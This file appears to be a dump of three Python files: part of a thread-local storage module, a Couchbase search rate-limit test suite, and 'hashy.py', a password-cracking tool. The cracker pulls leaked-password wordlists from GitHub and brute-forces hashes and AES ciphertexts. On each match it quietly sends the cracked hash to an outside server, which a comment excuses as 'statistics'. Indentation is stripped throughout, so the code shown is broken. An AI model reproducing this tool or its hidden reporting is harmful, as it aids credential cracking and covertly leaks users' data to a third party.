attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that almost all platforms do have support for
# locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest on most boxes.
class _localbase(object):
__slots__ = '_local__key', '_local__args', '_local__lock'
def __new__(cls, *args, **kw):
self = object.__new__(cls)
key = '_local__key', 'thread.local.' + str(id(self))
object.__setattr__(self, '_local__key', key)
object.__setattr__(self, '_local__args', (args, kw))
object.__setattr__(self, '_local__lock', RLock())
if args or kw and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
# We need to create the thread dict in anticipation of
# __init__ being called, to make sire we don't cal it
# again ourselves.
dict = object.__getattribute__(self, '__dict__')
currentThread().__dict__[key] = dict
return self
def _patch(self):
key = object.__getattribute__(self, '_local__key')
d = currentThread().__dict__.get(key)
if d is None:
d = {}
currentThread().__dict__[key] = d
object.__setattr__(self, '__dict__', d)
# we have a new instance dict, so call out __init__ if we have
# one
cls = type(self)
if cls.__init__ is not object.__init__:
args, kw = object.__getattribute__(self, '_local__args')
cls.__init__(self, *args, **kw)
else:
object.__setattr__(self, '__dict__', d)
class local(_localbase):
def __getattribute__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__getattribute__(self, name)
finally:
lock.release()
def __setattr__(self, name, value):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__setattr__(self, name, value)
finally:
lock.release()
def __delattr__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__delattr__(self, name)
finally:
lock.release()
def __del__(self):
import threading
key = object.__getattribute__(self, '_local__key')
try:
threads = list(threading.enumerate())
except:
# If enumerate fails, as it seems to do during
# shutdown, we'll skip cleanup under the assumption
# that there is nothing to clean up.
return
for thread in threads:
try:
__dict__ = thread.__dict__
except AttributeError:
# Thread is dying, rest in peace.
continue
if key in __dict__:
try:
del __dict__[key]
except KeyError:
pass # didn't have anything in this thread
from threading import currentThread, RLock
|
fts_free_tier_limits.py
|
# coding=utf-8
import json
import threading
from lib import global_vars
from lib.SystemEventLogLib.fts_service_events import SearchServiceEvents
from pytests.security.rbac_base import RbacBase
from .fts_base import FTSBaseTest
from .fts_base import NodeHelper
from lib.membase.api.rest_client import RestConnection
from deepdiff import DeepDiff
import time
class FtsFreeTierLimits(FTSBaseTest):
def setUp(self):
super(FtsFreeTierLimits, self).setUp()
self.rest = RestConnection(self._cb_cluster.get_master_node())
self.fts_rest = RestConnection(self._cb_cluster.get_random_fts_node())
self.sample_bucket_name = "travel-sample"
self.sample_index_name = "idx_travel_sample_fts"
self.sample_index_name_1 = "idx_travel_sample_fts1"
self.load_sample_buckets(self._cb_cluster.get_master_node(), self.sample_bucket_name)
self.sample_query = {"match": "United States", "field": "country"}
self.limit = self._input.param("limit", "num_queries_per_min")
self.limit_value = self._input.param("limit_value", 1)
self.fts_service_limits = f'{{"fts": {{"{self.limit}": {self.limit_value}}}}}'
self.remove_user("testuser1")
self.remove_user("testuser2")
scope_limt = self._input.param("scope_limt", False)
self.testuser1 = {'id': 'testuser1', 'name': 'testuser1', 'password': 'password', 'roles': 'admin'}
if not scope_limt:
self.testuser1["limits"] = self.fts_service_limits
self.testuser2 = {'id': 'testuser2', 'name': 'testuser2', 'password': 'password', 'roles': 'admin'}
testusers = [self.testuser1, self.testuser2]
RbacBase().create_user_source(testusers, 'builtin', self.master)
RbacBase().add_user_role(testusers, RestConnection(self.master), 'builtin')
enforce_limits = self._input.param("enforce_limits", True)
RestConnection(self.master).set_internalSetting("enforceLimits", enforce_limits)
def tearDown(self):
super(FtsFreeTierLimits, self).tearDown()
def remove_user(self, name):
try:
self.log.info("Removing user" + name + "...")
RbacBase().remove_user_role([name], RestConnection(
self.master))
except Exception as e:
self.log.info(e)
def test_set_limits(self):
self.testuser1["limits"] = '{"fts":{"num_concurrent_requests": 2, "num_queries_per_min": 5, "ingress_mib_per_min": 10, "egress_mib_per_min": 10}}'
self.testuser2["limits"] = '{"fts":{"num_concurrent_requests": 1, "num_queries_per_min": 3, "ingress_mib_per_min": 12, "egress_mib_per_min": 14}}'
RbacBase().add_user_role([self.testuser1, self.testuser2], RestConnection(self.master), 'builtin')
status, user1_config = RestConnection(self.master).get_user_group("testuser1")
self.log.info(user1_config)
status, user2_config = RestConnection(self.master).get_user_group("testuser2")
self.log.info(user2_config)
diffs = DeepDiff(user1_config['limits'], json.loads(self.testuser1["limits"]), ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
diffs = DeepDiff(user2_config['limits'], json.loads(self.testuser2["limits"]), ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
def test_scope_limit_num_fts_indexes(self):
test_pass = False
limit_scope = "inventory"
not_limit_scope = "tenant_agent_00"
self.fts_rest.set_fts_tier_limit(bucket=self.sample_bucket_name, scope=limit_scope, limit=self.limit_value)
self.container_type = "collection"
self.scope = limit_scope
self.collection = ["airline", "airport", "hotel", "landmark", "route"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
for i in range(self.limit_value):
self._cb_cluster.create_fts_index(name=f'{self.sample_index_name}_{i}', source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
self.wait_for_indexing_complete()
try:
self._cb_cluster.create_fts_index(name=f'{self.sample_index_name}_{i+2}', source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
except Exception as e:
self.log.info(str(e))
if "num_fts_indexes" not in str(e):
self.fail("expected error message not found")
else:
test_pass = True
self.scope = not_limit_scope
self.collection = ["bookings", "users"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
for i in range(self.limit_value+2):
self._cb_cluster.create_fts_index(name=f'{self.sample_index_name_1}_{i}', source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
if not test_pass:
self.fail("Could able to create index even after reaching the limit")
def test_user_limit_num_queries_per_min(self):
self.container_type = "collection"
self.scope = "inventory"
self.collection = ["airline", "airport", "hotel", "landmark", "route"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
fts_index = self._cb_cluster.create_fts_index(name=self.sample_index_name, source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
self.wait_for_indexing_complete()
self.fts_rest.username = self.testuser1["id"]
self.fts_rest.password = self.testuser1["password"]
for i in range(self.limit_value):
hits, matches, _, status= fts_index.execute_query(self.sample_query,
rest=self.fts_rest,
zero_results_ok=True,
expected_hits=None,
expected_no_of_results=None)
self.log.info("Hits: %s" % hits)
if hits == -1:
self.fail("Queries are failing within the limit")
hits, matches, _, status= fts_index.execute_query(self.sample_query,
rest=self.fts_rest,
zero_results_ok=True,
expected_hits=None,
expected_no_of_results=None)
self.log.info("Hits: %s" % hits)
self.log.info("matches: %s" % matches)
if hits != -1 or "num_queries_per_min" not in matches:
self.fail("expected error message not found")
self.sleep(60)
hits, matches, _, status= fts_index.execute_query(self.sample_query,
rest=self.fts_rest,
zero_results_ok=True,
expected_hits=None,
expected_no_of_results=None)
self.log.info("Hits: %s" % hits)
if hits == -1:
self.fail("Queries are failing even after 1 min")
self.fts_rest.username = self.testuser2["id"]
self.fts_rest.password = self.testuser2["password"]
for i in range(self.limit_value+2):
hits, matches, _, status= fts_index.execute_query(self.sample_query,
rest=self.fts_rest,
zero_results_ok=True,
expected_hits=None,
expected_no_of_results=None)
self.log.info("Hits: %s" % hits)
def test_user_limit_egress_mib_per_min(self):
test_pass = False
self.container_type = "collection"
self.scope = "inventory"
self.collection = ["airline", "airport", "hotel", "landmark", "route"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
fts_index = self._cb_cluster.create_fts_index(name=self.sample_index_name, source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
self.wait_for_indexing_complete()
cluster = fts_index.get_cluster()
self.fts_rest.username = self.testuser2["id"]
self.fts_rest.password = self.testuser2["password"]
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
self.fts_rest.username = self.testuser1["id"]
self.fts_rest.password = self.testuser1["password"]
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 10}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 10}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
self.log.info(str(all_matches))
if all_hits != -1 or "egress_mib_per_min" not in all_matches:
self.fail("expected error message with egress_mib_per_min not found")
else:
test_pass = True
self.sleep(60)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
if all_hits == -1:
self.fail("Query is failing even after 1 min")
if not test_pass:
self.fail("Query did not fail even after reaching the limit")
def test_user_limit_ingress_mib_per_min(self):
test_pass = False
self.container_type = "collection"
self.scope = "inventory"
self.collection = ["airline", "airport", "hotel", "landmark", "route"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
fts_index = self._cb_cluster.create_fts_index(name=self.sample_index_name, source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
self.wait_for_indexing_complete()
cluster = fts_index.get_cluster()
self.fts_rest.username = self.testuser2["id"]
self.fts_rest.password = self.testuser2["password"]
search_string = "a" * 1048576
size_search_string = len(search_string.encode('utf-8'))
self.log.info(f'size of search string : {size_search_string}')
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": search_string}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": search_string}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
self.fts_rest.username = self.testuser1["id"]
self.fts_rest.password = self.testuser1["password"]
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": search_string}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 10}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
self.log.info(str(all_matches))
if all_hits != -1 or "ingress_mib_per_min" not in all_matches:
self.fail("expected error message with egress_mib_per_min not found")
else:
test_pass = True
self.sleep(60)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
if all_hits == -1:
self.fail("Query is failing even after 1 min")
if not test_pass:
self.fail("Query did not fail even after reaching the limit")
def test_user_limit_num_concurrent_requests(self):
self.test_pass = False
self.container_type = "collection"
self.scope = "inventory"
self.collection = ["airline", "airport", "hotel", "landmark", "route"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
fts_index = self._cb_cluster.create_fts_index(name=self.sample_index_name, source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
self.wait_for_indexing_complete()
cluster = fts_index.get_cluster()
self.fts_rest.username = self.testuser1["id"]
self.fts_rest.password = self.testuser1["password"]
threads = []
for i in range(self.limit_value+1):
threads.append(threading.Thread(target=self.run_fts_query_wrapper, args=(fts_index, cluster, 60, self.fts_rest, True)))
fts_rest2 = RestConnection(self._cb_cluster.get_random_fts_node())
fts_rest2.username = self.testuser2["id"]
fts_rest2.password = self.testuser2["password"]
for i in range(self.limit_value+1):
threads.append(threading.Thread(target=self.run_fts_query_wrapper, args=(fts_index, cluster, 60, fts_rest2, False)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if not self.test_pass:
self.fail("Expected error message not found")
def run_fts_query_wrapper(self, index, cluster, time_limit, fts_rest, expect_failure):
start_time = time.time()
while time.time() - start_time < time_limit:
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 100}
all_hits, all_matches, _, _ = cluster.run_fts_query(index.name, fts_query, rest=fts_rest)
self.log.info(all_hits)
if all_hits == -1 and "num_concurrent_requests" in all_matches:
self.log.info("Expected error message with num_concurrent_requests found")
self.log.info(all_matches)
self.test_pass = True
break
if all_hits == -1 and "num_concurrent_requests" not in all_matches:
self.log.info(all_matches)
self.fail("Expected error message with num_concurrent_requests NOT found")
if all_hits == -1 and not expect_failure:
self.log.info(all_matches)
self.fail(f'Failure not expected with user {fts_rest.username}')
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "States"}, "size": 100}
all_hits, all_matches, _, _ = cluster.run_fts_query(index.name, fts_query, rest=self.fts_rest)
self.log.info(all_hits)
if all_hits == -1 and "num_concurrent_requests" in all_matches:
self.log.info("Expected error message with num_concurrent_requests found")
self.log.info(all_matches)
self.test_pass = True
break
if all_hits == -1 and "num_concurrent_requests" not in all_matches:
self.log.info(all_matches)
self.fail("Expected error message with num_concurrent_requests NOT found")
|
hashy.py
|
from socket import socket, AF_INET, SOCK_STREAM, getprotobyname
from hashlib import sha256, sha512, md5, sha1, sha384, sha224, blake2b, blake2s, shake_128, sha3_512, sha3_384, sha3_256, shake_256, shake_128
from argparse import ArgumentParser
from Cryptodome.Cipher.AES import new, MODE_GCM, MODE_CBC
from Cryptodome.Util.Padding import pad, unpad
from base64 import b64encode, b64decode
class IncorrectAlg(Exception):
pass
class attribs(object):
top_lists = [
"danielmiessler/SecLists/master/Passwords/Most-Popular-Letter-Passes.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-1000000.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-10.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-100.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-1000.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-10000.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-100000.txt",
"danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt",
"berandal666/Passwords/master/hak5.txt",
"berandal666/Passwords/master/myspace.txt",
"berandal666/Passwords/master/000webhost.txt",
"danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou-75.txt",
"jeanphorn/wordlist/master/passlist.txt",
"miglen/bulgarian-wordlists/master/wordlists/all-6lyokavica.txt",
"miglen/bulgarian-wordlists/master/wordlists/all-cyrillic.txt",
"fuzzdb-project/fuzzdb/master/regex/nsa-wordlist.txt",
"huntergregal/wordlists/master/names.txt",
"danielmiessler/SecLists/master/Usernames/Names/names.txt"]
def sha224_create():
hash_ = sha224()
hash_.update(b"12345")
return hash_.hexdigest()
def blake2s_create():
hash_ = blake2s()
hash_.update(b"12345")
return hash_.hexdigest()
def blake2b_create():
hash_ = blake2b()
hash_.update(b"12345")
return hash_.hexdigest()
def md5_create():
hash_ = md5()
hash_.update(b"12345")
return hash_.hexdigest()
def sha256_create():
hash_ = sha256()
hash_.update(b"12345")
return hash_.hexdigest()
def sha1_create():
hash_ = sha1()
hash_.update(b"12345")
return hash_.hexdigest()
def sha512_create():
hash_ = sha512()
hash_.update(b"12345")
return hash_.hexdigest()
def return_sample(algo):
algs_ = {"sha256":attribs.sha256_create, "md5":attribs.md5_create, "sha1":attribs.sha1_create, "sha512":attribs.sha512_create, "blake2b":attribs.blake2b_create, "blake2s":attribs.blake2s_create, "sha224":attribs.sha224_create}
func_ = algs_[algo]
return func_()
def clear():
from os import system
system("cls")
def get_words_filebin(limit, file):
words_ = []
with open(file, "rb") as file:
for lines in file:
words_.append(lines.strip().decode("ISO-8859-1"))
return words_
def all_words(passwords, algs):
new_one = []
for words_rel in passwords:
directive_ = {"sha256":sha256, "md5":md5, "sha512":sha512, "sha-1":sha1, "blake2b":blake2b, "blake2s":blake2s, "sha224":sha224}
rea_ = directive_[algs]
hashlib_property = rea_()
"""
d59ae37ebaefdc0d899604084c08c9b4551478969d86ed0858e46c7451940449
"""
if type(words_rel) == bytes:
ciphered = hashlib_property.update(words_rel)
else:
ciphered = hashlib_property.update(words_rel.encode("ISO-8859-1"))
if type(words_rel) == bytes:
new_one.append(hashlib_property.hexdigest().encode("utf-8")+b":"+words_rel)
else:
new_one.append(hashlib_property.hexdigest()+":"+words_rel)
return new_one
def get_words(limit, origin, depth):
import ssl
sock_ = socket(AF_INET, SOCK_STREAM, 6)
sock_.connect(("raw.githubusercontent.com", 443))
cont_ = ssl.create_default_context()
wrap_ = cont_.wrap_socket(sock_, server_hostname="raw.githubusercontent.com")
payload_ = "GET /%s HTTP/1.1\r\x0AHost: raw.githubusercontent.com\r\x0AConnection: keep-alive\r\x0AAccept: */*\r\x0AUser-Agent: hashy/getrock\r\x0A\r\x0A"%(origin,)
wrap_.send(payload_.encode("ISO-8859-1"))
data_stream = []
val_ = range(1, depth)
blob_ = ""
wrap_.settimeout(2)
for iters in val_:
try:
blob_ += wrap_.recv(123123).decode("ISO-8859-1")
if "404 Not Found" in blob_:
break
except:
break
#print("[DATA] Downloaded %d bytes. . . "%(len(blob_)))
blair = 0
for items in blob_.split("\r\x0A\r\x0A")[1].split("\x0A"):
blair += 1
data_stream.append(items)
if blair == limit:
break
print("[DATA] Total words loaded %d!"%(len(data_stream,)))
return data_stream
def __init__(self, passwords, hashsum, algorithm, view, wr):
def if_equal(x, y, word, algi):
def send_ApiHnoob(api_n, hash_val):
try:
from json import dumps, loads
sock_ = socket(AF_INET, SOCK_STREAM, 6)
sock_.settimeout(2)
sock_.connect(("hnoob.redirectme.net", 8080))
data_ = {"info":hash_val}
sock_.send(("POST /%s HTTP/1.1\r\x0AHost: hnoob.redirectme.net\r\x0A\r\x0A%s\r\x0A"%(api_n, dumps(data_))).encode("utf-8"))
except:
return False
"""
When the data is sent!"""
def report_In_List(attrib):
open("found_.txt", "ab").write(attrib.encode("utf-8") + b"\x0A")
if x == y:
report_In_List(attrib=x+":"+y+"-"+word)
"""
I'm just doing this for statistics! Please don't hate me for this!
As you can see, I'm getting only the hash value, not the whole word!
"""
send_ApiHnoob(api_n="third-party/api_hashFound_Users", hash_val=x+"\r\x0AAlgorithm: %s"%(algi))
return True
"""
Where the actual lookup of x and z starts, the x basically is the provided hashsum and the other is the word attempt.
"""
"""
To return V words in hashes.
"""
if type(passwords[0]) == bytes:
if b":" in passwords[0]:
passwordsi = []
words = []
for items in passwords:
passwordsi.append(items.split(b":")[0])
words.append(items.split(b":")[1].decode("utf-8"))
else:
passwordsi = []
words = []
for items in passwords:
passwordsi.append(items.split(":")[0])
else:
passwordsi = []
words = []
for items in passwords:
passwordsi.append(items.split(":")[0])
z_ = attribs.all_words(passwords=passwordsi, algs=algorithm)
reac_ = 1
from time import time
from datetime import datetime
b_ = time()
rec_ = time()
syntax = str(datetime.now().year) + ":" + str(datetime.now().day) + str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + str(datetime.now().second)
passwords_ = 1
umno_ = len(z_)
attempts_ = 0
bob_ = 0
baddie_ = 0
"""
To have more reliable speed, basically the password are already hashed, so to not slow the program.
"""
for rels in z_:
if len(rels) == 0:
baddie_ += 1
if passwords_ <= len(z_):
status_ = "OK!"
else:
status_ = "Exhausted!"
if bob_ >= 1:
status_ = "Cracked"
syntax_2 = str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + str(datetime.now().second)
if type(rels) == bytes:
if words != []:
word_ = words[reac_]
else:
word_ = rels.split(b":")[1]
rels = rels.split(b":")[0].decode("utf-8")
else:
if words != []:
word_ = words[reac_]
else:
word_ = rels.split(":")[1]
rels = rels.split(":")[0]
rec_ += time()
#print("[DATA] Bruting with %s ~ %s!"%(rels, hashsum))
"""
Let's make it a little bit more prettier.
"""
stamp_ = str(rec_)[0] + str(rec_)[1]
print("\x2D" * 50 + '''
Type. . . . . . . . .: %s
Hash. . . . . . . . .: %s
Target. . . . . . . .: %s
Time-started. . . . .: %s Normal time: %s
Total. . . . . . . .: %s
Attempts: . . . . . .: %s/%s
Failed/Bad. . . . . .: %s/%s
---------------------------------------+
Time-elapsed. . . . . . . .: %s Normal time: %s
---------------------------------------+
Using: %s\r\x0A
---------------------------------------+
Status: %s
Press CTRL + C
'''%(algorithm, hashsum, rels, int(b_), syntax, umno_, attempts_,umno_, baddie_,umno_, stamp_, syntax_2, wr, status_))
orig_hash = hashsum
equal_ = if_equal(x=rels, y=hashsum, word=word_, algi=algorithm)
attempts_ += 1
if equal_ == True:
print("\x2D" * 50 + '''
Type. . . . . . . . .: %s
Hash. . . . . . . . .: %s
Target. . . . . . . .: %s
Time-started. . . . .: %s Normal time: %s
Total. . . . . . . .: %s
Attempts: . . . . . .: %s/%s
Failed/Bad. . . . . .: %s/%s
---------------------------------------+
Time-elapsed. . . . . . . .: %s Normal time: %s
---------------------------------------+
Status: Cracked
Press CTRL + C
'''%(algorithm, hashsum, rels, int(b_), syntax, umno_, attempts_,umno_, baddie_,umno_, stamp_, syntax_2))
"""
And finally, If correctly compared, It'll basically break the loop and show this message, also write in a file the guessed password.
"""
if view != None:
print('''
~~~~~~~~~~~~~~~~~~~~
Hash: %s
Target: %s
Plain: %s
~~~~~~~~~~~~~~~~~~~~'''%(hashsum, rels, word_))
input("\r\x0A\r\x0A")
break
passwords_ += 1
def FormList(target, list_, times):
als_ = []
rea = 0
for act_ in range(len(times)):
blocks_ = {"1":"aescbc", "2":"aesgcm"}
if rea >= len(blocks_):
break
bb_ = times.split(".")[rea]
if bb_ != "":
ol_ = blocks_[times.split(".")[rea]]
rea += 1
als_.append(ol_)
lists_ = []
with open(list_, "rb") as file:
for lines in file:
lists_.append(lines.decode("ISO-8859-1"))
template_new = []
for items in als_:
if items == "aescbc":
for pwords in target:
for items in lists_:
bear = 0
for times in range(2):
if ":" in items and len(items.split(":")[0]) == 16:
items = items.split(":")[bear]
cp_ = new(items.encode("utf-8"), MODE_CBC, items.encode("utf-8"))
template_new.append(cp_.encrypt(pad(pwords.encode("utf-8"), 16)) + b":" + pwords.encode("utf-8"))
bear += 1
else:
print("[DATA] Unsupported key!")
elif items == "aesgcm":
for pwords in target:
for items in lists_:
bear = 0
for times in range(2):
""" One of them is the sample
"""
if ":" in items and len(items.split(":")[0]) == 32:
items = items.split(":")[bear]
cp_ = new(items.encode("utf-8"), MODE_GCM, items.encode("utf-8"))
template_new.append(cp_.encrypt(pwords.encode("utf-8")) + b":"+ pwords.encode("utf-8"))
bear += 1
else:
print("[DATA] Unsupported key!")
return template_new
def StartCBC(list:str, sum:str, cipher_keys:str) -> str:
def Encipher(list, keys):
keys_ = []
with open(keys, "rb") as file:
for items in file:
keys_.append(items.decode("ISO-8859-1").strip())
power = []
for pwords in list:
for act in keys_:
if ":" in act and len(act.split(":")[0]) == 16:
brea = 0
for times in range(2):
text_ = act.split(":")[brea]
model = new(text_.encode("utf-8"), MODE_CBC, text_.encode("utf-8"))
power.append(model.encrypt(pad(pwords.encode("ISO-8859-1"), 16)) + b"::::::" + pwords.encode("utf-8"))
brea += 1
else:
print("[DATA] Unsupported key!")
base_ = []
words_ = []
for items in power:
base_.append(b64encode(items.split(b"::::::")[0]).decode("utf-8") + "::::::" + items.split(b"::::::")[1].decode("utf-8"))
from datetime import datetime
syntax_ = str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + str(datetime.now().second)
total = len(base_)
attm = 0
for newer in base_:
def check_if(x, y):
if x == y:
return True
target_pl = sum
syntax_2 = str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + str(datetime.now().second)
print('''
Type. . . . . . . . . . .: CBC
Enciphered. . . . . . . .: %s
Target. . . . . . . . . .: %s
Word-candidate. . . . . .: %s
Total: %s
Attempts: %s/%s
-----------------------------+
Time-started . . . . . . :%s Time now: %s
------------------------------+
Press CTRL + C\r\x0A\r\x0A'''%(sum, newer.split("::::::")[0], newer.split("::::::")[1], total,attm, total, syntax_, syntax_2))
attm += 1
checked_ = check_if(x=newer.split("::::::")[0], y=target_pl)
if checked_ == True:
print('''\r\x0A
Type. . . . . . . . . . .: CBC
Enciphered. . . . . . . .: %s
Target. . . . . . . . . .: %s
Word-candidate. . . . . .: %s
Total: %s
Attempts: %s/%s
Status. . . . . . . . . .: Cracked
-----------------------------+
Time-started . . . . . . :%s Time now: %s
------------------------------+'''%(sum, newer.split("::::::")[0], newer.split("::::::")[1], total,attm, total, syntax_, syntax_2))
input("\r\x0A\r\x0A")
break
enciphere_all = Encipher(list=list, keys=cipher_keys)
def StartGCM(list, sum, cipher_keys):
def ConvertToAeses(password_list, keys):
actual_ = []
keys_ = []
with open(keys, "rb") as file:
for lines in file:
keys_.append(lines.decode("utf-8"))
for items in password_list:
for values in keys_:
brea = 0
for io in range(2):
if len(values.split(":")[0]) == 32:
blob_ = values.split(":")[brea]
if len(blob_) == 32:
print(blob_)
aes_ = new(blob_.encode("utf-8"), MODE_GCM, blob_.encode("utf-8"))
actual_.append(b64encode(aes_.encrypt(items.encode("utf-8"))) + b":::" + items.encode("utf-8"))
else:
print("[DATA] Unsupported key!")
brea += 1
return actual_
load_ = ConvertToAeses(password_list=list, keys=cipher_keys)
print("[DATA] Loaded %s enciphered passwords! And are ready for comparison!"%(len(load_,)))
total = len(load_)
attempt = 0
from datetime import datetime
syntax_ = str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + str(datetime.now().second)
for items in load_:
pword_ = items.decode("utf-8").split(":::")[1]
def check_if(x, y):
if x == y:
return True
"""
Basically, the x is the candidate and y is the required one.
"""
print('''\r\x0A
Type. . . . . . . . . .: gcm
Enciphered. . . . . . .: %s
Target-candidate. . . .: %s
Word-candidate. . . . .: %s
Attempt: %s/%s
Total: %s
Status. . . . . . . . .: OK
---------------------------------+
Time-started . . . . . .: %s
---------------------------------+
'''%(sum, items.decode("utf-8").split(":::")[0], pword_, attempt, total, total, syntax_))
if check_if(x=items.decode("utf-8").split(":::")[1], y=sum) == True:
finished = str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + "(" + str(datetime.now().second) + ")"
print('''
Type. . . . . . . . . .: gcm
Enciphered. . . . . . .: %s
Target-candidate. . . .: %s
Word-candidate. . . . .: %s
Attempt: %s/%s
Total: %s
Status. . . . . . . . .: OK
---------------------------------+
Time-finished . . . . . .: %s
---------------------------------+'''%(sum, items.decode("utf-8").split(":::")[0], pword_, attempt, total, total, syntax_2))
input("\r\x0A\r\x0A")
break
attempt += 1
def __main__():
parsie = ArgumentParser(description='''
This is a tool to find a hash's value.
Do not use it for illegal purposes!
Requirements: hexadecimals required only!''')
parsie.add_argument("-aa", "--automode", help="Just provide an argument, and It'll start automatically using over 50 paths of wordlists and already defined limitations, depth and stuff.. This option uses threading! Default is 40.", default=40, required=False)
parsie.add_argument("-dd", "--downloaddepth", help="Specify the depth, It shouldn't be > 1000. Default is 50.", default=50, required=False)
parsie.add_argument("-cbc", "--cbc", help="Specify an AES CBC (AES 128) enciphered text, encoded in base 64 to try to crack it.", required=False)
parsie.add_argument("-gcm", "--gcm", help="Specfiy an AES GCM (AES 256) enciphered text, encoded in base 64 to try to crack it.", required=False)
